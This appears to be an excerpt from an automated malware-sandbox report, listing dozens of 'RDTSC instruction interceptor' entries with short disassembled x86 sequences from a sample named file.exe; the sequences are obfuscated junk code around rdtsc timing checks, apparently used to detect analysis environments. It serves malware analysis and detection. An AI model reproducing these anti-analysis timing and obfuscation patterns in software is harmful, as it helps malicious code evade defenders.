Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54AAC second address: D54B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F0D344F4ABCh 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, dword ptr [ebp+122D39CDh] 0x00000016 push 00000000h 0x00000018 ja 00007F0D344F4ABBh 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F0D344F4AB8h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D368Fh], edi 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54B01 second address: D54B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53CC6 second address: D53CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D55B61 second address: D55B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D55B6C second address: D55BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 nop 0x00000007 sub dword ptr [ebp+1246F218h], edi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F0D344F4AB8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1D12h], ecx 0x0000002f push 00000000h 0x00000031 add ebx, 1E48A7B8h 0x00000037 mov edi, ebx 0x00000039 xchg eax, esi 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D55BB0 second address: D55BC4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D55BC4 second address: D55BC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D55BC9 second address: D55BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54C6D second address: D54C77 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54C77 second address: D54C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54C7D second address: D54C97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54C97 second address: D54C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54C9B second address: D54CA5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D54CA5 second address: D54CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56AEF second address: D56BAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F0D344F4AC7h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F0D344F4AB8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e xor edi, 140AC914h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007F0D344F4AB8h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 add bx, 14BDh 0x00000055 or ebx, 7B5B9E01h 0x0000005b and edi, dword ptr [ebp+122D36BDh] 0x00000061 xchg eax, esi 0x00000062 jbe 00007F0D344F4ACAh 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F0D344F4AC4h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D55DAC second address: D55DDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70904h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0D34B70908h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56D18 second address: D56D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56D1C second address: D56D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56D20 second address: D56D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F0D344F4AB8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov ebx, dword ptr [ebp+122D2A0Ch] 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov dword ptr [ebp+122D27C9h], edi 0x0000003c mov eax, dword ptr [ebp+122D0009h] 0x00000042 clc 0x00000043 stc 0x00000044 push FFFFFFFFh 0x00000046 mov ebx, 53A96C00h 0x0000004b nop 0x0000004c jl 00007F0D344F4AC6h 0x00000052 jns 00007F0D344F4AC0h 0x00000058 push eax 0x00000059 push edi 0x0000005a pushad 0x0000005b jmp 00007F0D344F4ABBh 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D57C40 second address: D57C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D57C46 second address: D57C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D57C4A second address: D57C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D59B05 second address: D59B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D59B09 second address: D59B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D59B0D second address: D59B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D59B13 second address: D59B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D59B19 second address: D59B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5AC52 second address: D5ACAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70907h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F0D34B70907h 0x0000000f popad 0x00000010 nop 0x00000011 push ebx 0x00000012 xor ebx, dword ptr [ebp+122D3941h] 0x00000018 pop ebx 0x00000019 push 00000000h 0x0000001b pushad 0x0000001c js 00007F0D34B708F7h 0x00000022 cmc 0x00000023 popad 0x00000024 push 00000000h 0x00000026 movsx edi, cx 0x00000029 mov dword ptr [ebp+122D25EFh], ebx 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5ACAA second address: D5ACB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0D344F4AB6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5BBAF second address: D5BC10 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F0D34B708F8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007F0D34B708F8h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 mov di, si 0x00000044 push 00000000h 0x00000046 sub dword ptr [ebp+122D30B7h], eax 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jnl 00007F0D34B708F6h 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5BC10 second address: D5BC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5BC15 second address: D5BC35 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F0D34B708FEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F0D34B708F6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5CC63 second address: D5CCCD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D344F4AB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007F0D344F4ABEh 0x00000011 nop 0x00000012 sub dword ptr [ebp+122D19ECh], ecx 0x00000018 and edi, 03D18329h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F0D344F4AB8h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Dh 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a cld 0x0000003b push 00000000h 0x0000003d mov bx, si 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F0D344F4AC1h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5CCCD second address: D5CCD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D59E10 second address: D59E16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D59E16 second address: D59E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DE83 second address: D5DE8D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5CE61 second address: D5CE6B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0D34B708FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EDE1 second address: D5EDE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EFB0 second address: D5EFB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D60037 second address: D6003B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6003B second address: D60041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68091 second address: D680CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F0D344F4AC7h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0D344F4AC9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D680CB second address: D680CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D678BC second address: D678C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D67BE4 second address: D67BF2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D67BF2 second address: D67BF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D67BF7 second address: D67C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D67C07 second address: D67C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D344F4AC5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0D344F4AC5h 0x00000012 jmp 00007F0D344F4ABFh 0x00000017 jmp 00007F0D344F4AC2h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D67C5E second address: D67C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AF02 second address: D6AF08 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07F58 second address: D07F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6EDB7 second address: D6EDBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6EDBF second address: D6EDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7083A second address: D70847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70847 second address: D7084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7084B second address: D70851 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70851 second address: D7087C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0D34B70907h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jl 00007F0D34B70900h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7087C second address: D708A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jg 00007F0D344F4AC3h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D708A2 second address: D708A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76AAA second address: D76AAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D75726 second address: D75740 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D34B70904h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D75F9D second address: D75FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jmp 00007F0D344F4ABBh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jc 00007F0D344F4AB6h 0x0000001a je 00007F0D344F4AB6h 0x00000020 jmp 00007F0D344F4ABFh 0x00000025 popad 0x00000026 pushad 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 push edi 0x0000002a pop edi 0x0000002b pushad 0x0000002c popad 0x0000002d push esi 0x0000002e pop esi 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D75FDD second address: D75FE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D75FE4 second address: D75FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D75FEA second address: D75FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D762D8 second address: D762F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0D344F4AC9h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D762F6 second address: D76312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D34B70908h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76640 second address: D7664E instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7664E second address: D76671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007F0D34B70904h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007F0D34B708F6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF959 second address: CFF95E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF95E second address: CFF968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF968 second address: CFF97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0D344F4AB6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF97A second address: CFF97E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B29F second address: D7B2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F0D344F4ABEh 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B2B7 second address: D7B2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7B56C second address: D7B599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0D344F4AC3h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F0D344F4AC1h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BA23 second address: D7BA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F0D34B70906h 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BA41 second address: D7BA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C334 second address: D7C338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82194 second address: D821BD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F0D344F4AC7h 0x00000010 js 00007F0D344F4ABCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D821BD second address: D821CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F0D34B708F6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81243 second address: D81249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81249 second address: D81275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F0D34B708FEh 0x0000000c jc 00007F0D34B70918h 0x00000012 jmp 00007F0D34B708FEh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D813CB second address: D813E2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D344F4ABAh 0x00000008 pushad 0x00000009 js 00007F0D344F4AB6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8186A second address: D8186E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8186E second address: D81872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
